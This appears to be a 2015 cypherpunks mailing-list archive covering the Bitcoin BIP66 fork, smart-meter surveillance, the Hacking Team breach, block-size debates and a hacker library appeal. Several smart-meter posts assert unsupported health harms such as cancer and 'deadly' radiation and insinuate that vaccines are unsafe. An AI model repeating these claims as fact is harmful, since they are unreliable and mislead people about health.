mining hash rate has been signaling its intent to begin enforcing BIP66 strict DER signatures. As part of the BIP66 rules, once 950 of the last 1,000 blocks were version 3 (v3) blocks, all upgraded miners would reject version 2 (v2) blocks. Early morning UTC on 4 July 2015, the 950/1000 (95%) threshold was reached. Shortly thereafter, a small miner (part of the non-upgraded 5%) mined an invalid block--as was an expected occurrence. Unfortunately, it turned out that roughly half the network hash rate was mining without fully validating blocks (called SPV mining), and built new blocks on top of that invalid block. Note that the roughly 50% of the network that was SPV mining had explicitly indicated that they would enforce the BIP66 rules. By not doing so, several large miners have lost over $50,000 dollars worth of mining income so far. All software that assumes blocks are valid (because invalid blocks cost miners money) is at risk of showing transactions as confirmed when they really aren't. This particularly affects lightweight (SPV) wallets and software such as old versions of Bitcoin Core which have been downgraded to SPV-level security by the new BIP66 consensus rules. The immediate fix, which is well underway as of this writing, is to get all miners off of SPV mining and back to full validation (at least temporarily). As this progresses, we will reduce our current recommendation of waiting 30 extra confirmations to a lower number. """ From l at odewijk.nl Sat Jul 4 08:09:45 2015 From: l at odewijk.nl (=?UTF-8?Q?Lodewijk_andr=C3=A9_de_la_porte?=) Date: Sun, 5 Jul 2015 00:09:45 +0900 Subject: Bitcoin Book Review In-Reply-To: References: Message-ID: Rich people don't jump a sinking ship, even if it's loaded with gold/Bitcoin. The case was so obviously solved, really, who would want to associate? It's his own bloody fault for staying in the US, too! Go teach English in China for a while or something. Give'm a challenge! -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 408 bytes Desc: not available URL: From grarpamp at gmail.com Sat Jul 4 21:18:49 2015 From: grarpamp at gmail.com (grarpamp) Date: Sun, 5 Jul 2015 00:18:49 -0400 Subject: There's this really kewl mesh network that's being deployed world-wide... In-Reply-To: References: Message-ID: On Sat, Jul 4, 2015 at 11:08 AM, Seth wrote: > ...have you heard about it? No? Well...odds are you've already given implied > consent for the IoT. Film looks relavant on many levels but is long. https://www.youtube.com/watch?v=YRjjLyVkP0o https://www.youtube.com/results?search_query=infowars+smart+meters "Power concedes nothing without a demand. It never did and it never will. Find out just what any people will quietly submit to and you have found out the exact measure of injustice and wrong which will be imposed upon them." -- Frederick Douglass (1818-1895), author, former slave The most common way people give up their power is by thinking they don't have any. Be the change you wish to see. From grarpamp at gmail.com Sat Jul 4 21:25:02 2015 From: grarpamp at gmail.com (grarpamp) Date: Sun, 5 Jul 2015 00:25:02 -0400 Subject: Stop Watching Us Message-ID: Other video... from 2013... https://www.youtube.com/results?search_query=stop+watching+us https://www.youtube.com/watch?v=0cxPEf9ZWIo Protests always generate interesting youtube chats with many people. From list at sysfu.com Sun Jul 5 08:38:51 2015 From: list at sysfu.com (Seth) Date: Sun, 05 Jul 2015 08:38:51 -0700 Subject: There's this really kewl mesh network that's being deployed world-wide... In-Reply-To: References: Message-ID: On Sat, 04 Jul 2015 21:18:49 -0700, grarpamp wrote: > On Sat, Jul 4, 2015 at 11:08 AM, Seth wrote: >> ...have you heard about it? No? Well...odds are you've already given >> implied >> consent for the IoT. > > Film looks relavant on many levels but is long. This is true. For those that don't have the time or desire or watch, some takeaways: The biggest takeaway is that jig is up with the current business model of centralized power distribution. The growth of decentralized power production (home solar etc) is driving a stake into the heart of the beast. The power company execs know this openly admit as much. So they are changing business models to one of CENTRALIZED DATA HARVESTING AND SURVEILLANCE. 'smart meters' are a massive and global offensive thrust of the 'Internet of Things' surveillance state and control grid directly into the home. They form a mesh network on the 900Mhz band. They are supposed to have 2.4Ghz radio (not yet widely activated) for extracting surveillance data and controlling 'smart' appliances in the home. I use the term 'smart' in quotes because it is a goddamn propaganda term and needs to be replaced in the popular culture as soon as possible with something more apt and mocking, say 'evil-genius'. I will use the term 'evil-genius' meters from now on. Anyways, these evil-genius meters douse your house with something on the order of 40,000 microwave pulses a day. The meters are built in China, and allegedly have not had any real safety testing done on them. The AC-DC converters used to power the evil genius brain in these devices is supposedly a crap one and generates a significant power waste along with 'dirty electricity' (that is a choppy or rough sine wave instead of smooth clean one) which radiates throughout the home via the electrical wiring. The legal principle of 'implied consent' being used to justify the stealth installation of the meters world wide is a very shaky one. The vast majority of people that are having these meters installed on their homes by the power company are complete unaware of what is going on. It's a classic trojan horse. It's also a contractual violation. To have a valid contract there must be an offer, consideration, and acceptance. There is none of this with the evil-genius meter roll-outs. They simply are putting them in without asking the customer for permission. Depending on the jurisdiction, you can refuse the evil-genius meter, but then you're hit with an extortionate monthly 'meter reading' fee, which was not charged before the evil-genius meter roll-out began. Some people in the Los Angeles area that have refused evil-genius meter installation, have been locked into months long battle with the utility company and consequently LIVING WITHOUT ELECTRICITY for months on end. Now that is some crazy shit, now matter how you slice it. WHY are the companies so adamant about having these devices installed to the point where they're willing to cut off a resister's power for months on end, and foregoing that revenue? Perhaps to make an example out of them? I could go on and on. If you anybody that sleeps in a room next to one of these devices, *especially* if they are pregnant women or young children, get them the fuck away from it as soon as possible, ideally by having the device removed and replaced with an analog one, or by changing rooms or living locations. From shelley at misanthropia.org Sun Jul 5 10:38:14 2015 From: shelley at misanthropia.org (Shelley) Date: Sun, 05 Jul 2015 10:38:14 -0700 Subject: There's this really kewl mesh network that's being deployed world-wide... In-Reply-To: <14e5f228a40.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> References: Message-ID: <20150705173757.F005FC00290@frontend1.nyi.internal> On July 5, 2015 8:46:53 AM Seth wrote: > > This is true. For those that don't have the time or desire or watch, some > takeaways: TY for the summary. I block all things goog but suspected this was the topic; agree with your comments. Yes, because they have neglected the basic infrastructure for decades & discourage the use of individual solar/etc., some otherwise sensible people are welcoming the idea of these spy boxes - because their bullshit propaganda is designed to appeal to those of us who are concerned about the environment. Oh sure, why would I mind if "the grid" reschedules my laundry to an "off-peak" time? It'll save me money (*always* the hook, if the environmental concern-troll act fails), and I'm not home anyway, right? Oh wait, they know when I'm not home... they also know: when I wake up, which appliances I use and when, whether I have had an overnight guest, when I leave and for how long I am gone, (which they can combine with transit pass records- which some employers have integrated with electronic, RFID-polluted work IDs so there is almost no avoiding it unless you take active measures to do so, which then invites further spook scrutiny), credit card purchases and surveillance cam info (interconnected by TrapWire [0] to know where I've been & what I've been doing all day, so even if you leave your universal tracking device at home, walk/bike everywhere and pay with cash/BTC, you are still tracked-as-fuck), when I get home, what I read or watch and listen to, when I go to sleep, and with whom ... If your municipality hasn't yet deployed these spy boxes, do what you can to slow their roll out! Is this what you want (in addition to the very real detrimental health effects already mentioned?) I live in one of the most liberal, progressive cities around and initially they'd treated us as some conspiracy theorists when a few of us raised concerns about the unnecessary collection of data, the security of the transmission of said data & who will have access to it and the health concerns. Now they've been scheduling dog & pony show community meetings to "address our concerns," and attending one probably puts you on the same list as going to a 2600 meeting... They are supposed to begin the deployment of these spy boxes here in 2016-17 and I'll be damned if they'll put one on my abode. For being such an inconvenient troublemaker, they'll charge $50 or more per billing cycle (final amount is as yet undecided.) This is total bullshit. They can upgrade "the grid" without making it a universal spying network, but why would they when sheeple don't complain and push back? [0] https://publicintelligence.net/unravelling-trapwire/ http://www.wired.com/2012/08/trapwire-strafor-biz/ -S > The biggest takeaway is that jig is up with the current business model of > centralized power distribution. The growth of decentralized power > production (home solar etc) is driving a stake into the heart of the beast. > > The power company execs know this openly admit as much. So they are > changing business models to one of CENTRALIZED DATA HARVESTING AND > SURVEILLANCE. > > 'smart meters' are a massive and global offensive thrust of the 'Internet > of Things' surveillance state and control grid directly into the home. > They form a mesh network on the 900Mhz band. They are supposed to have > 2.4Ghz radio (not yet widely activated) for extracting surveillance data > and controlling 'smart' appliances in the home. > > I use the term 'smart' in quotes because it is a goddamn propaganda term > and needs to be replaced in the popular culture as soon as possible with > something more apt and mocking, say 'evil-genius'. I will use the term > 'evil-genius' meters from now on. > > Anyways, these evil-genius meters douse your house with something on the > order of 40,000 microwave pulses a day. The meters are built in China, and > allegedly have not had any real safety testing done on them. > > The AC-DC converters used to power the evil genius brain in these devices > is supposedly a crap one and generates a significant power waste along > with 'dirty electricity' (that is a choppy or rough sine wave instead of > smooth clean one) which radiates throughout the home via the electrical > wiring. > > The legal principle of 'implied consent' being used to justify the stealth > installation of the meters world wide is a very shaky one. The vast > majority of people that are having these meters installed on their homes > by the power company are complete unaware of what is going on. It's a > classic trojan horse. > > It's also a contractual violation. To have a valid contract there must be > an offer, consideration, and acceptance. There is none of this with the > evil-genius meter roll-outs. They simply are putting them in without > asking the customer for permission. > > Depending on the jurisdiction, you can refuse the evil-genius meter, but > then you're hit with an extortionate monthly 'meter reading' fee, which > was not charged before the evil-genius meter roll-out began. > > Some people in the Los Angeles area that have refused evil-genius meter > installation, have been locked into months long battle with the utility > company and consequently LIVING WITHOUT ELECTRICITY for months on end. Now > that is some crazy shit, now matter how you slice it. > > WHY are the companies so adamant about having these devices installed to > the point where they're willing to cut off a resister's power for months > on end, and foregoing that revenue? Perhaps to make an example out of them? > > I could go on and on. > > If you anybody that sleeps in a room next to one of these devices, > *especially* if they are pregnant women or young children, get them the > fuck away from it as soon as possible, ideally by having the device > removed and replaced with an analog one, or by changing rooms or living > locations. From list at sysfu.com Sun Jul 5 15:24:59 2015 From: list at sysfu.com (Seth) Date: Sun, 05 Jul 2015 15:24:59 -0700 Subject: There's this really kewl mesh network that's being deployed world-wide... In-Reply-To: References: Message-ID: On Sun, 05 Jul 2015 10:04:09 -0700, Sean Lynch wrote: > LOL. If you don't work for the NSA, they probably love you for getting > people to focus on harmless (and pointless, and overpriced) smart meters > instead of the real, extremely harmful mass surveillance that's > happening. > > The power output from these things is substantially lower than a > cellphone > or wifi device due to their low data rates, hence the need to mesh. Cancer LOL. Lymphona LOL Brain tumors LOL. Leukemia ROFL. Cell phones are so safe, the 500 Billion dollar a year industry needed to obtain special legal protection absolving them of any liability in a 1998 U.S. Telecommunications bill rider. Companies need special legislation drafted and passed that absolves them of all legal liability **only** when the products they are selling completely safe and harmless, everybody got that? Just like the vaccine industry was granted immunity from legal liability in the United States in 1986. Because their products are so safe. Those of you that are interested in a fact based breakdown on the risk of RF exposure from evil-genius meters should watch this 2010 presentation to the San Francisco Tesla Society by consulting engineer Rob States: https://www.youtube.com/watch?v=FLeCTaSG2-U If there's any silver lining to the deadly health impacts of these devices it's the golden opportunity dropped into the lap of privacy and freedom loving people to leverage opposition to health threat to simultaneously drive out the privacy and data-enslavement threats. From seanl at literati.org Sun Jul 5 10:04:09 2015 From: seanl at literati.org (Sean Lynch) Date: Sun, 05 Jul 2015 17:04:09 +0000 Subject: There's this really kewl mesh network that's being deployed world-wide... In-Reply-To: References: Message-ID: On Sat, Jul 4, 2015, 08:13 Seth wrote: ...have you heard about it? No? Well...odds are you've already given implied consent for the IoT. https :// www.youtube.com /watch?v=0hJqs1jwAPc LOL. If you don't work for the NSA, they probably love you for getting people to focus on harmless (and pointless, and overpriced) smart meters instead of the real, extremely harmful mass surveillance that's happening. The power output from these things is substantially lower than a cellphone or wifi device due to their low data rates, hence the need to mesh. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1036 bytes Desc: not available URL: From tom at ritter.vg Sun Jul 5 15:44:21 2015 From: tom at ritter.vg (Tom Ritter) Date: Sun, 5 Jul 2015 17:44:21 -0500 Subject: progression of technologies In-Reply-To: <20150625032613.48665228148@palinka.tinho.net> References: <20150625032613.48665228148@palinka.tinho.net> Message-ID: On 24 June 2015 at 22:26, wrote: > Paraphrasing Bonnie Raitt, let's give 'em something germane > to argue about. In particular, what do I have wrong here: > > http://www.csmonitor.com/World/Passcode/Passcode-Voices/2015/0617/Opinion-The-reasonable-expectation-fallacy I'm far from certain, but I think what you have wrong is the notion that wavelength doesn't matter. I think the courts have decided it does: https://en.wikipedia.org/wiki/Joffe_v._Google,_Inc.#U.S._Supreme_Court Specifically, "most of the general public lacks the expertise to intercept and decode payload data transmitted over a Wi-Fi network." Therefore the notion that you can point whatever sort of 'camera' you want at people to capture them isn't accurate. (The other relevant case is that the police do need a warrant to point infrared cameras at people's houses.) -tom From list at sysfu.com Sun Jul 5 17:56:01 2015 From: list at sysfu.com (Seth) Date: Sun, 05 Jul 2015 17:56:01 -0700 Subject: There's this really kewl mesh network that's being deployed world-wide... In-Reply-To: <20150705173757.F005FC00290@frontend1.nyi.internal> References: <20150705173757.F005FC00290@frontend1.nyi.internal> Message-ID: On Sun, 05 Jul 2015 10:38:14 -0700, Shelley wrote: > TY for the summary. I block all things goog but suspected this was the > topic; agree with your comments. Glad someone found it helpful. I've actually been meaning to post more viewing notes along with interesting videos that I think are worth sharing, with the aim of being more respectful of people's time. Still working on the discipline to take notes while viewing. It's a bit like disciplining yourself to take pictures when you're traveling. There's always a feeling of "oh man, this is a hassle and I just want to enjoy the moment without fussing with a camera." But you're always glad you took pictures later on. Regarding blocking of all things goog: Until I get my own MediaGoblin instance up and running I can try repost videos on a service that's a tad less an arm of the surveillance state. I was thinking of inserting the content into the new Alexandria project. If you have any other suggestions let me know. > Yes, because they have neglected the basic infrastructure for decades & > discourage the use of individual solar/etc., some otherwise sensible > people are welcoming the idea of these spy boxes - because their > bullshit propaganda is designed to appeal to those of us who are > concerned about the environment. > > Oh sure, why would I mind if "the grid" reschedules my laundry to an > "off-peak" time? It'll save me money (*always* the hook, if the > environmental concern-troll act fails), and I'm not home anyway, right? Electricity is a unique commodity in that it's not that efficient to store, so I can see the logit in trying to shift usage to off peak times. The engineer Rob States from the other follow-up vid I posted says that utilities could save 30% on power transmission by switching to superconductor high tension lines. > Oh wait, they know when I'm not home... > > they also know: > when I wake up, > which appliances I use and when, > whether I have had an overnight guest, > when I leave and for how long I am gone, (which they can combine with > transit pass records- which some employers have integrated with > electronic, RFID-polluted work IDs so there is almost no avoiding it > unless you take active measures to do so, which then invites further > spook scrutiny), > credit card purchases and surveillance cam info (interconnected by > TrapWire [0] to know where I've been & what I've been doing all day, so > even if you leave your universal tracking device at home, walk/bike > everywhere and pay with cash/BTC, you are still tracked-as-fuck), > when I get home, > what I read or watch and listen to, > when I go to sleep, and with whom ... > > If your municipality hasn't yet deployed these spy boxes, do what you > can to slow their roll out! Is this what you want (in addition to the > very real detrimental health effects already mentioned?) > > I live in one of the most liberal, progressive cities around and > initially they'd treated us as some conspiracy theorists when a few of > us raised concerns about the unnecessary collection of data, the > security of the transmission of said data & who will have access to it > and the health concerns. Now they've been scheduling dog & pony show > community meetings to "address our concerns," and attending one probably > puts you on the same list as going to a 2600 meeting... Agree with all this. If you can grow a beard, start farming it! haha. > They are supposed to begin the deployment of these spy boxes here in > 2016-17 and I'll be damned if they'll put one on my abode. Time to start whipping up some suspicion and discontent with the peasants beforehand, I'd say. I would like to live in a culture of resistance where the prevalent mindset is always "Hmm, big mega corp 'X' or gov is trying to roll out such and such product/service/program/legislation. How are they trying to fuck us in the ass this time?" > For being such an inconvenient troublemaker, they'll charge $50 or more > per billing cycle (final amount is as yet undecided.) $50 a billing cycle is outrageous. Depending on the laws where you live, you might be best served by communication your refusal via registered mail or whatever the equivalent is in your area. Takebackyourpower.net has lots of resources for how to properly serve the electrical company with a refusal notice so that you will maintain the best legal position to dispute the extortion charges they try to punish you with. > This is total bullshit. They can upgrade "the grid" without making it a > universal spying network, but why would they when sheeple don't complain > and push back? I think there's a lot of push-back happening, we're on the cusp and it's gaining momentum every day. three people on my street have already gone back to analogue a long time ago, and I'm approaching three more neighbors with the hopes of convincing them to do the same. I might even be going door to door and distributing copies of the 'Take Back your Power' documentary. From coderman at gmail.com Sun Jul 5 18:18:17 2015 From: coderman at gmail.com (coderman) Date: Sun, 5 Jul 2015 18:18:17 -0700 Subject: There's this really kewl mesh network that's being deployed world-wide... In-Reply-To: References: <20150705173757.F005FC00290@frontend1.nyi.internal> Message-ID: On 7/5/15, Seth wrote: > ... > Glad someone found it helpful. I've actually been meaning to post more > viewing notes along with interesting videos that I think are worth > sharing, with the aim of being more respectful of people's time. abridged & annotated selections would be quite useful! perhaps a way to coordinate efforts (thinking of CCC dead trees, too) looking over just CCC and DEF CON archives, it is months to cull... > Electricity is a unique commodity in that it's not that efficient to > store, so I can see the logit in trying to shift usage to off peak times. private storage - excluding cost, pair of 8 x tesla home storage on each side of garage - even active household could just "top off" every other day on grid. power co sees transient peak loads conveying no information about household activity other than aggregate daily consumption. eventually you'll transition to all decentralized renewable generation? now if only we could steadily improve earth humans, like we improve technology :) best regards, From mirimir at riseup.net Sun Jul 5 20:53:25 2015 From: mirimir at riseup.net (Mirimir) Date: Sun, 05 Jul 2015 21:53:25 -0600 Subject: Hacking Team has been hacked (hard) In-Reply-To: <5599F683.40200@gna.org> References: <5599F683.40200@gna.org> Message-ID: <5599FBB5.402@riseup.net> On 07/05/2015 09:31 PM, Christian Gagneraud wrote: > As nobody has reported it yet, here we go: > https://twitter.com/hackingteam https://news.ycombinator.com/item?id=9836336 From moritz at headstrong.de Sun Jul 5 14:45:34 2015 From: moritz at headstrong.de (Moritz) Date: Sun, 05 Jul 2015 23:45:34 +0200 Subject: Dead Tree Lovers -- Call for Books Message-ID: <5599A57E.9020808@headstrong.de> DEAD TREE LOVERS -- CALL FOR BOOKS _________________________________________________________ ||-------------------------------------------------------|| ||.--. .-._ .----. || |||==|____| |H|___ .---.___|""""|_____.--.___ || ||| |====| | |xxx|_ |+++|=-=|_ _|-=+=-|==|---||| |||==| | | | | \ | | |_\/_| | | ^ ||| ||| | | | | |\ \ .--. | |=-=|_/\_|-=+=-| | ^ ||| ||| | | | | |_\ \_( oo )| | | | | | ^ ||| |||==|====| |H|xxx| \ \ |''| |+++|=-=|""""|-=+=-|==|---||| ||`--^----'-^-^---' `-' "" '---^---^----^-----^--^---^|| ||-------------------------------------------------------|| ||-------------------------------------------------------|| || ___ .-.__.-----. .---.|| || |===| .---. __ .---| |XX|<(*)>|_|^^^||| || , /(| |_|III|__|''|__|:x:|=| | |=| ||| || _a'{ / (|===|+| |++| |==| | | | | | ||| || '/\\/ _(|===|-| | |''| |:x:|=| | | | ||| ||_____ -\{___(| |-| | | | | | | | | | ||| || _(____)|===|+|[I]|DK|''|==|:x:|=|XX|<(*)>|=|^^^||| || `---^-^---^--^--'--^---^-^--^-----^-^---^|| ||-------------------------------------------------------|| ||_______________________________________________________|| tl;dr: We want your books. Send them to us. In December 2014, over 500 books were brought to Chaos Communication Congress in Hamburg for an experiment: During the busy days of Congress, with over 12.000 visitors, how will people react to a library of dead trees? In partnership with La Quadrature Du Thé and the Congress team, a cozy reading area was set up on the fourth floor. For us Dead Tree Lovers, to see all seats and carpet space occupied almost 24/7 by interested readers filled us with delight. The library lives on! And has considerably grown since. The database now contains over 666 titles. As a travelling library, we will bring it to places near you, to hacker events and hackerspaces, to other public spaces. It is currently hosted and accessible around the clock at OpenLab Augsburg, Germany, for free borrowing or cheap purchase, replacing existing books by other used copies. The database is limited in that it does not yet contain all of the historical material that we have so far collected on the earlier days of hacking, pre-80s. Thanks to Werner Pieper, a friend of Wau Holland and publisher, we have started to add rare material from the good old times when hacking was part of the broader political counterculture movement and not yet mainstream. Thanks to the CCC, we are now hosting a complete paper archive of the Chaos Computer Club publication 'Die Datenschleuder'. The Humanistische Union (HU) donated most (all?) of their publications. WE WANT MORE. The library needs your help. Please send us your books and reading suggestions for us to hunt down paper copies! Or better yet, send us offers first. We're open for anything tech, political, scifi, as long as you feel it influenced your life profoundly and is worth reading. The focus is hacker culture and its history in the broader sense. It is not necessary to give your books away forever, we can log the source and return it if and when you want it back. Dead Tree Lovers c/o OpenLab Augsburg e.V. Elisenstrasse 1 D-86159 Augsburg, Germany JOIN! We have started a mailing list to discuss all kinds of book matters: book scanning, library software (or lack thereof), book recommendations etc. the DTL team // July 2015 --------------------------------------------------------- irc.hackint.org #deadtreelovers https://wiki.hackerspaces.org/Dead_Tree_Lovers https://www.librarything.com/catalog/hacklib https://lists.hackerspaces.org/mailman/listinfo/deadtreelovers rss: https://www.librarything.com/rss/recent/hacklib twitter: https://twitter.com/hacklibrary -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 455 bytes Desc: OpenPGP digital signature URL: From griffin at cryptolab.net Sun Jul 5 21:16:47 2015 From: griffin at cryptolab.net (Griffin Boyce) Date: Mon, 06 Jul 2015 00:16:47 -0400 Subject: Hacking Team has been hacked (hard) In-Reply-To: <5599FBB5.402@riseup.net> References: <5599F683.40200@gna.org> <5599FBB5.402@riseup.net> Message-ID: <7a51599a75afd16669ae66aee50235ac@cryptolab.net> Mirimir wrote: > Christian Gagneraud wrote: >> As nobody has reported it yet, here we go: >> https://twitter.com/hackingteam > > https://news.ycombinator.com/item?id=9836336 Good; fuck 'em. Couldn't have happened to a better group of assholes. On a technical note, there seem to be an abundance of Thumbs.db files among their leaked documents. Another one for the "what were they thinking?" file. ~Griffin From juan.g71 at gmail.com Sun Jul 5 22:34:58 2015 From: juan.g71 at gmail.com (Juan) Date: Mon, 6 Jul 2015 02:34:58 -0300 Subject: [Bitcoin-development] questions about bitcoin-XT code fork & non-consensus hard-fork In-Reply-To: <5599DC34.1060006@echeque.com> References: <20150616081131.GL10743@leitl.org> <1741267.YsnpBZuTEf@lapuntu> <1723765.Bfy9H6RHV9@lapuntu> <5599DC34.1060006@echeque.com> Message-ID: <559a137b.1928370a.3f973.ffffde4a@mx.google.com> On Mon, 06 Jul 2015 11:39:00 +1000 "James A. Donald" wrote: > > Way back in the beginning I said an ever growing block chain would > cause unacceptable costs and inconvenience, and lo and behold, it is > causing substantial and ever growing costs and inconvenience. > But look at the bright side! Every single transaction gets recorded and stored, until jesus destroys the universe (it's in the bible). What else can privacy advocates wish for? > Of course, restraining the block chain to manageable growth without > losing other good characteristics is inherently hard, and it was a > lot easier for me to point at the problem than to fix it. > > > From seanl at literati.org Sun Jul 5 19:52:47 2015 From: seanl at literati.org (Sean Lynch) Date: Mon, 06 Jul 2015 02:52:47 +0000 Subject: [Bitcoin-development] questions about bitcoin-XT code fork & non-consensus hard-fork In-Reply-To: <5599DC34.1060006@echeque.com> References: <20150616081131.GL10743@leitl.org> <1741267.YsnpBZuTEf@lapuntu> <1723765.Bfy9H6RHV9@lapuntu> <5599DC34.1060006@echeque.com> Message-ID: On Sun, Jul 5, 2015, 18:44 James A. Donald wrote: Way back in the beginning I said an ever growing block chain would cause unacceptable costs and inconvenience, and lo and behold, it is causing substantial and ever growing costs and inconvenience. Of course, restraining the block chain to manageable growth without losing other good characteristics is inherently hard, and it was a lot easier for me to point at the problem than to fix it. I had been hoping that we would see more stuff happening off-blockchain by now, with Bitcoin acting more as a clearing house between smaller payment providers, but all the regulations protecting the big banks from competition make it really hard to do anything off-blockchain that looks even remotely like a payments service. Side chains of some kind seem like a reasonable approach, and I'm guessing that it will be the difficulty of dealing with the "central" block chain that will finally force people "over the hump" into using some kind of sidechain payments system. I really want to see micropayments, for example, and those seem to be too unwieldy and expensive to do the main chain. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1402 bytes Desc: not available URL: From juan.g71 at gmail.com Sun Jul 5 23:45:15 2015 From: juan.g71 at gmail.com (Juan) Date: Mon, 6 Jul 2015 03:45:15 -0300 Subject: Hacking Team has been hacked (hard) In-Reply-To: <7a51599a75afd16669ae66aee50235ac@cryptolab.net> References: <5599F683.40200@gna.org> <5599FBB5.402@riseup.net> <7a51599a75afd16669ae66aee50235ac@cryptolab.net> Message-ID: <559a23ee.06d98c0a.540f9.7bfc@mx.google.com> "Hacking Team hit by breach; leak suggests it sold spyware to oppressive regimes" Oh my god. Allegedly the sold stuff to the WRONG nazis. That's really terrible. From juan.g71 at gmail.com Sun Jul 5 23:55:55 2015 From: juan.g71 at gmail.com (Juan) Date: Mon, 6 Jul 2015 03:55:55 -0300 Subject: Hacking Team has been hacked (hard) In-Reply-To: <7a51599a75afd16669ae66aee50235ac@cryptolab.net> References: <5599F683.40200@gna.org> <5599FBB5.402@riseup.net> <7a51599a75afd16669ae66aee50235ac@cryptolab.net> Message-ID: <559a2670.88da8c0a.a23b.ffffe2a2@mx.google.com> they* From l at odewijk.nl Sun Jul 5 12:06:36 2015 From: l at odewijk.nl (=?UTF-8?Q?Lodewijk_andr=C3=A9_de_la_porte?=) Date: Mon, 6 Jul 2015 04:06:36 +0900 Subject: speaking of Bitcoin ... the july4th split In-Reply-To: References: Message-ID: Half the net is SPV... MINING??? They got what they had coming, though. Very strange to not spend a tease on full validation :s Maybe they hope to save some time and start mining that new block earlier? Seems they lost quite a bit more than they might've ever saved now. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 371 bytes Desc: not available URL: From jamesd at echeque.com Sun Jul 5 18:39:00 2015 From: jamesd at echeque.com (James A. Donald) Date: Mon, 06 Jul 2015 11:39:00 +1000 Subject: [Bitcoin-development] questions about bitcoin-XT code fork & non-consensus hard-fork In-Reply-To: References: <20150616081131.GL10743@leitl.org> <1741267.YsnpBZuTEf@lapuntu> <1723765.Bfy9H6RHV9@lapuntu> Message-ID: <5599DC34.1060006@echeque.com> On 2015-07-03 09:24, Lodewijk andré de la porte wrote: > It's pretty annoying to have an even bigger blockchain, don't get me > wrong on that, but that's just the way Bitcoin works: a blockchain that > grows with use. There's no reason for it to truly upset you, either. > Running a full node is already something you don't do for no reason at > all. I can't really make this argument as well as I like. The point is > that if you have a reason you would still do it later, and if you don't > you don't already. Some people noted that the pruning makes it possible > to run a full node on their phones. Cool! But there's no reason to. In > fact, you won't because it'd drain your battery. We'll be okay without > the one silly geek that does it anyway. > > So.. these points were already hard to argue against clearly. Then > there's "we can scale externally".... The trouble is that there's so > many ways, like pinning (sidechains/mastercoin), exclusively > inter-institutional settlement, debt based moneys ("the bearer of this > token is entitled to..."), and all of them could work! In fact, we could > just abandon Bitcoin alltogether! And that's the core of my > counterargument: we don't have to cripple Bitcoin, so let's not. Let's > not make it more complicated than it has to be. If we do scale > externally, let it be for exceedingly good reasons and at exceedingly > competitive prices. Way back in the beginning I said an ever growing block chain would cause unacceptable costs and inconvenience, and lo and behold, it is causing substantial and ever growing costs and inconvenience. Of course, restraining the block chain to manageable growth without losing other good characteristics is inherently hard, and it was a lot easier for me to point at the problem than to fix it. From Rayzer at riseup.net Mon Jul 6 11:59:44 2015 From: Rayzer at riseup.net (Razer) Date: Mon, 06 Jul 2015 11:59:44 -0700 Subject: There's this really kewl mesh network that's being deployed world-wide... In-Reply-To: References: Message-ID: <559AD020.4020302@riseup.net> On 07/05/2015 03:24 PM, Seth wrote: > the 500 Billion dollar a year industry needed to obtain special legal > protection absolving them of any liability in a 1998 U.S. > Telecommunications bill rider. Don't know, or believe, there were any medically related issues addressed by that rider, albeit the Finns were studying cell phone radiation early on, but rider to the bill gave them common carrier status to legally prohibit people with scanners from monitoring what at the time were mostly (if not all) analog radio transmissions. Early users of cellies, much like now, weren't technically literate enough to realize that the sex talk they were making with their GF on the side (or that business deal) was 'in the clear' for anyone to hear, and when they began to find out, the cell phone industry trembled, and lobbied congress for common carrier protection from eavesdropping. -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 819 bytes Desc: OpenPGP digital signature URL: From guninski at guninski.com Mon Jul 6 05:02:31 2015 From: guninski at guninski.com (Georgi Guninski) Date: Mon, 6 Jul 2015 15:02:31 +0300 Subject: Will Greece goo boom? In-Reply-To: <20150602165938.GB2900@sivokote.iziade.m$> References: <20150602165938.GB2900@sivokote.iziade.m$> Message-ID: <20150706120231.GA2500@sivokote.iziade.m$> On Tue, Jun 02, 2015 at 07:59:38PM +0300, Georgi Guninski wrote: > Will Greece go boom relatively soon? > http://www.cnbc.com/id/102810291 ==== European Parliament President Martin Schulz addressed the results of the Greek referendum on Sunday evening. He said Greek Finance Minister Yanis Varoufakis's promises that banks would re-open in a day or two "very difficult and dangerous" and said Europe needed to urgently discuss humanitarian aid for Greece. ==== From grarpamp at gmail.com Mon Jul 6 12:30:17 2015 From: grarpamp at gmail.com (grarpamp) Date: Mon, 6 Jul 2015 15:30:17 -0400 Subject: There's this really kewl mesh network that's being deployed world-wide... In-Reply-To: References: <20150705173757.F005FC00290@frontend1.nyi.internal> Message-ID: Depending on who owns the meter and the box it plugs into and what the contract says... don't remove it, build a faraday cage around it. From chgans at gna.org Sun Jul 5 20:31:15 2015 From: chgans at gna.org (Christian Gagneraud) Date: Mon, 06 Jul 2015 15:31:15 +1200 Subject: Hacking Team has been hacked (hard) Message-ID: <5599F683.40200@gna.org> As nobody has reported it yet, here we go: https://twitter.com/hackingteam From john at johnlgrubbs.net Mon Jul 6 08:34:24 2015 From: john at johnlgrubbs.net (John) Date: Mon, 06 Jul 2015 15:34:24 +0000 Subject: Hacking Team has been hacked (hard) In-Reply-To: <559a2670.88da8c0a.a23b.ffffe2a2@mx.google.com> References: <5599F683.40200@gna.org> <5599FBB5.402@riseup.net> <7a51599a75afd16669ae66aee50235ac@cryptolab.net> <559a2670.88da8c0a.a23b.ffffe2a2@mx.google.com> Message-ID: <81D51CC0-EA66-4E9F-957C-C5041BCE1FED@johnlgrubbs.net> Be sure to check out the github repo hackedteam. There RCS app had the ability to plant evidence not just gather, notably childporn. This blows parallel construction out of the water. On July 6, 2015 1:55:55 AM CDT, Juan wrote: >they* -- Sent from my Android device with K-9 Mail. Please excuse my brevity. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 594 bytes Desc: not available URL: From admin at pilobilus.net Mon Jul 6 13:56:58 2015 From: admin at pilobilus.net (Steve Kinney) Date: Mon, 06 Jul 2015 16:56:58 -0400 Subject: There's this really kewl mesh network that's being deployed world-wide... In-Reply-To: References: <20150705173757.F005FC00290@frontend1.nyi.internal> Message-ID: <559AEB9A.2000509@pilobilus.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 07/06/2015 03:30 PM, 